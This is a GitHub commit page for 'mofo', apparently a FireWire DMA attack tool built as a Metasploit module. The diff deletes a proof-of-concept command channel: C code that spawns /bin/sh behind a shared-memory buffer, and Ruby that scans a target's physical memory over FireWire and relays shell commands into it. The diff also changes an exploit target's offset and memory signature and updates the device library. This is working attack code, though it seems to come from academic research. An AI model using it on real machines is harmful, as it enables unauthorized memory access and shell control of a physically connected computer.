Browse files

Added rough installation instructions

Removed up some unused files
removed fu
  • Loading branch information...
1 parent 86761d7 commit 895172cadeebe2f81372310620dfa21c113d084d dma committed Apr 13, 2012
Showing with 63 additions and 262 deletions.
  1. +3 −3 README
  2. +0 −102 channel-poc/channel.c
  3. +0 −119 channel-poc/channel.rb
  4. +0 −11 channel-poc/spam.c
  5. +56 −25 forensic1394/device.rb
  6. +4 −2 module/mofo.rb
View
6 README
@@ -7,7 +7,7 @@ An explanation of our work can be found in our paper: "mofo-final.pdf".
#### INSTALLATION INSTRUCTIONS ####
#install prerequisites
-sudo apt-get install cmake
+sudo apt-get install cmake git build-essential
# Fetch, build and install libforensic1394
git clone git://git.freddie.witherden.org/forensic1394.git
@@ -20,8 +20,8 @@ cd ..
# install ffi gem
#TODO: there has got to be a better way
sudo apt-get install ruby1.9.1-dev
-gem1.9.1 install ffi
-cp -r /var/lib/gems/1.9.1/gems/ffi-1.0.11 /opt/metasploit-4.1.4/ruby/lib/ruby/gems/1.9.1/gems/
+sudo gem1.9.1 install ffi
+sudo cp -r /var/lib/gems/1.9*/gems/ffi-1* /opt/metasploit-4*/ruby/lib/ruby/gems/1.9*/gems/
# install mofo
git clone git@github.com:mrbreaker/mofo.git
View
102 channel-poc/channel.c
@@ -1,102 +0,0 @@
-#include <sys/mman.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <stdbool.h>
-#include <unistd.h>
-#include <fcntl.h>
-#include <errno.h>
-
-#pragma pack(1)
-
-#define BUFFER_SIZE 255
-#define PATTERN_SIZE 16
-#define CACHE_SIZE ( 10 * 1024 * 1024 )
-#define SEND_MASTER '^'
-#define SEND_SLAVE '~'
-
-struct msg {
- char pattern[PATTERN_SIZE];
- volatile char flags;
- volatile unsigned char len;
- char data[BUFFER_SIZE];
-};
-typedef struct msg message;
-
-message* initMessage(){
- int i;
- message *p;
-
- p = mmap(NULL,sizeof(message),PROT_WRITE|PROT_READ,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
- if(p == (void*)-1)
- puts("mmap failed");
-
- memcpy(p->pattern,"81d2ec67g412df64",PATTERN_SIZE);
-
- for(i=0;i<PATTERN_SIZE;i++)
- p->pattern[i]-=1;
-
- p->flags = SEND_SLAVE;
- return p;
-}
-
-void blockMessage(message *m){
- while(1)
- if(m->flags != SEND_SLAVE)
- return;
-}
-
-int main(int argc,char **argv){
- int fdstdin[2];
- int fdstdout[2];
- int oldstdin;
- int oldstdout;
- message* m;
- m = initMessage();
- if(pipe(fdstdin))
- perror("creating pipe failed");
-
- if(pipe(fdstdout))
- perror("creating pipe failed");
-
- fcntl(fdstdin[0],F_SETFL,O_NONBLOCK);
- fcntl(fdstdin[1],F_SETFL,O_NONBLOCK);
- fcntl(fdstdout[0],F_SETFL,O_NONBLOCK);
- fcntl(fdstdout[1],F_SETFL,O_NONBLOCK);
-
- oldstdin=dup(fileno(stdin));
- close(fileno(stdin));
-
- oldstdout=dup(fileno(stdout));
- close(fileno(stdout));
-
- dup2(fdstdin[0], fileno(stdin));
- dup2(fdstdout[1], fileno(stdout));
-
- if(fork()){
- //parent
- dup2(oldstdin, fileno(stdin));
- dup2(oldstdout, fileno(stdout));
-
- while(1){
- int len;
- blockMessage(m);
- write(fdstdin[1], m->data, m->len);
- write(fileno(stdout), m->data, m->len);
- if ((len = read(fdstdout[0], m->data, BUFFER_SIZE)) == -1)
- m->len = 0;
- else
- m->len = len;
-
- m->flags = SEND_SLAVE;
- puts ("###################################");
- }
- }else{
- //child
- char *args = NULL;
- dup2(fileno(stdout), fileno(stderr));
- execvp("/bin/sh",&args);
- }
- return 0;
-}
-
View
119 channel-poc/channel.rb
@@ -1,119 +0,0 @@
-#!/usr/bin/env ruby
-require '../forensic1394/bus'
-require 'pp'
-require 'fcntl'
-
-
-def run(context)
- # first 17 characters of md5sum of awesome with the 9 removed
- sig = "70c1db56f301ce55"
- off = 0x00
-
- # Print phase, method and patch parameters
- puts ' Using signature: %s' % sig
- puts ' Using offset: %x' % off
-
- # Initialize
- d = initialize_fw(d)
-
- # Find memory size
- puts 'Detecting memory size...'
- memsize = 4 * 1024 * 1024 * 1024
- puts '%d MiB main memory detected' % (Integer(memsize)/(1024 * 1024))
-
- # Attack
- puts 'Starting attack...'
- begin
- # Find
- addr = findsig(d, sig, off, memsize)
- if !addr
- settings.success = False
- else
- puts '+ Signature found at 0x%x.' % addr
- while (1)
- data = ''
- begin
- STDIN.flush
- data = STDIN.read_nonblock(255)
- rescue
- data = ''
- end
- d.write(addr + 18, data)
- d.write(addr + 17, sprintf("%c", data.length))
- d.write(addr + 16, '^')
- while (d.read(addr + 16, 1) != '~')
- sleep(1)
- end
- len = d.read(addr + 17, 1)
- data = d.read(addr + 18, len.ord)
- print data
- end
- end
- rescue IOError => e
- success = false
- puts '-', 'I/O Error, make sure FireWire interfaces are properly connected.'
- puts e.message
- end
-
- if !success
- fail('Failed to dump.')
- end
-
-
- if not settings.success
- fail('Signature not found.')
- end
-end
-
-def initialize_fw(d)
- b = Bus.new
- # Enable SBP-2 support to ensure we get DMA
- b.enable_sbp2()
-
- begin
- for i in 3.downto(1)
- puts "[+] Initializing bus and enabling SBP2, please wait %2d seconds or press Ctrl+C \r" % i;
- STDOUT.flush
- sleep(1)
- end
- rescue
- puts 'Interrupted'
- end
-
- # Open the first device
- d = b.devices
-
- if (d.length > 0)
- d = d[0]
- d.open()
- puts ''
- else
- raise 'nothing connected'
- end
-
- return d
-end
-
-def findsig(d, sig, off, memsize)
- pagesize = 4096
- one_mb = 1 * 1024 * 1024
- for addr in (one_mb + off..memsize).step(pagesize)
- data = d.read(addr, sig.length)
- if (data == sig)
- return addr
- end
- end
- print()
- return
-end
-
-def fail(msg)
- puts "\n [!] Attack unsuccessful."
- puts msg
- exit
-end
-
-if __FILE__ == $0
- run( ARGV )
-end
-
View
11 channel-poc/spam.c
@@ -1,11 +0,0 @@
-#include <string.h>
-#include <stdlib.h>
-
-int main(int argc,char** argv){
- char *ptr;
- char i;
- for(;;i++){
- ptr = malloc(16);
- memset(ptr,i,16);
- }
-}
View
81 forensic1394/device.rb
@@ -49,7 +49,7 @@ def initialize (bus, devptr)
@vendor_id = Forensic1394.get_device_vendor_id(@devptr)
@request_size = Forensic1394.get_device_request_size(@devptr)
- @csr = FFI::Buffer.new(4, 256, true)
+ @csr = FFI::MemoryPointer.new(4, 256, true)
Forensic1394.get_device_csr(@devptr, @csr)
end
@@ -68,7 +68,7 @@ def setStale(stale)
# device is stale, an exception raised.
def open
- checkStale()
+ checkStale
process_result(Forensic1394.open_device(@devptr), 'Forensic1394.open_device')
end
@@ -85,7 +85,7 @@ def close
# Checks to see if the device is open or not, returning a boolean value.
# In the case of a stale handle false is returned.
- def isOpen
+ def isopen
if @stale
return false
else
@@ -98,18 +98,55 @@ def isOpen
# The device must be open and the handle can not be stale.
# Requests larger than @request_size will automatically be
# broken down into smaller chunks. The resulting data is
- # returned.
+ # returned. An exception is raised should an error occur. The
+ # optional buf parameter can be used to pass a specific ctypes
+ # c_char array to read into. If no buffer is passed then
+ # create_string_buffer will be used to allocate one.
- def read (addr, numb)
+ def read (addr, numb, buf=nil)
+ if buf == nil
+ # No buffer passed; allocate one
+ buf = FFI::MemoryPointer.new(1, numb, true)
+ else
+ raise "IMPLEMENT ME"
+ end
+
# Break the request up into rs size chunks; if numb % rs = 0 then
# lens may have an extra element; zip will take care of this
rs = @request_size
addrs = (addr..addr + numb).step(rs)
lens = [rs] * (Integer(numb) / Integer(rs)) + [numb % rs]
- return readreq(addrs.zip(lens))
- #buf = FFI::Buffer.new(1, numb, true)
- #readreq(addrs.zip(lens), buf)
- #return buf.get_bytes(0,numb)
+ readreq(addrs.zip(lens), buf)
+ return buf.get_bytes(0,numb)
+ end
+
+ ##
+ # Performs a batch of read requests of the form: [(addr1, len1),
+ # (addr2, len2), ...] and returns a generator yielding, in
+ # sequence, (addr1, buf1), (addr2, buf2), ..., . This is useful
+ # when performing a series of `scatter reads' from a device.
+
+ def readv (req)
+ checkStale()
+ # Create the request buffer
+ sum = 0
+ for addr, numb in req
+ sum += numb
+ end
+ buf = FFI::MemoryPointer.new(1, sum, true)
+
+ # Use readreq to read the requests into buf
+ readreq(req, buf)
+
+ # Generate the resulting buffers
+ off = 0
+ answers = []
+ for addr, numb in req
+ answers << [[addr, buf.get_pointer(off)]]
+ off += numb
+ end
+
+ return answers
end
##
@@ -119,7 +156,7 @@ def read (addr, numb)
# chunks. Uses writev internally.
def write (addr, buf)
- checkStale()
+ checkStale
# Break up the request
req = []
(0..buf.size).step(@request_size) do |off|
@@ -135,16 +172,15 @@ def write (addr, buf)
def writev (req)
checkStale()
- if isOpen() == 0
+ if isopen() == 0
raise "Forensic1394Exception", "not open"
end
# Prepare the request array(addr, len, buf)
for addr, buf in req
creq = Forensic1394::Req.new()
- b = FFI::MemoryPointer.new(:char,buf.size);
- b.write_array_of_char(buf.to_s)
-
+ b = FFI::MemoryPointer.new(1, buf.size, true)
+ b.put_bytes(0, buf.to_s)
creq[:addr]=addr
creq[:len]=buf.size
creq[:buf]= b
@@ -215,29 +251,24 @@ def csr
##
# Internal low level read function.
- def readreq(req)
- if isOpen() == 0
+ def readreq (req, buf)
+ if isopen() == 0
raise Forensic1394Exception, "not open"
end
+ # Create the request tuples
off = 0
- buf = ""
for addr, numb in req
- #set up the struct for passing
creq = Forensic1394::Req.new
creq[:addr] = addr
creq[:len]=numb
-
- b = FFI::MemoryPointer.new(:char,numb)
- creq[:buf]= b
-
- # Dispatch the request
+ creq[:buf]= buf.slice(off, numb)
+
+ # Dispatch the requests
status = Forensic1394.read_device_v(@devptr, creq, 1)
- buff += b.read_array_of_char()
process_result(status, "Forensic1394.read_device_v")
off += numb
end
- return buff
end
end
View
6 module/mofo.rb
@@ -29,7 +29,9 @@ def initialize(info = {})
'Arch' => ARCH_X86,
'Targets' =>
[
- [ 'Ubuntu 11.10', { 'Offset' => 0x540, 'Signature' => "\x74\x1e\x89\x5c\x24\x04\xc7\x04\x24\x70\x73\x05\x08\xe8\x3e\x53\xff\xff\x83\xc4\x24\x31\xc0\x5b\x5e", 'Space' => 75 } ],
+ [ 'Ubuntu 11.10', { 'Offset' => 0x590, 'Signature' =>
+ # "\x74\x1e\x89\x5c\x24\x04\xc7\x04\x24\x70\x73\x05\x08\xe8\x3e\x53\xff\xff\x83\xc4\x24\x31\xc0\x5b\x5e", 'Space' => 75 } ],
+ "\x74\x1e\x89\x5c\x24\x04\xc7\x04\x24", 'Space' => 75 } ],
# [ 'Ubuntu 11.10', { 'Offset' => 0x4f2, 'Signature' => "8B430C8B501C895424048B40", 'Space' => 75 } ],
],
'DefaultTarget' => 0,
@@ -108,7 +110,7 @@ def initialize_fw(b, d)
b.enable_sbp2()
begin
- for i in 3.downto(1)
+ for i in 4.downto(1)
puts "[+] Initializing bus and enabling SBP2, please wait %2d seconds or press Ctrl+C \r" % i;
STDOUT.flush
sleep(1)

0 comments on commit 895172c

Please sign in to comment.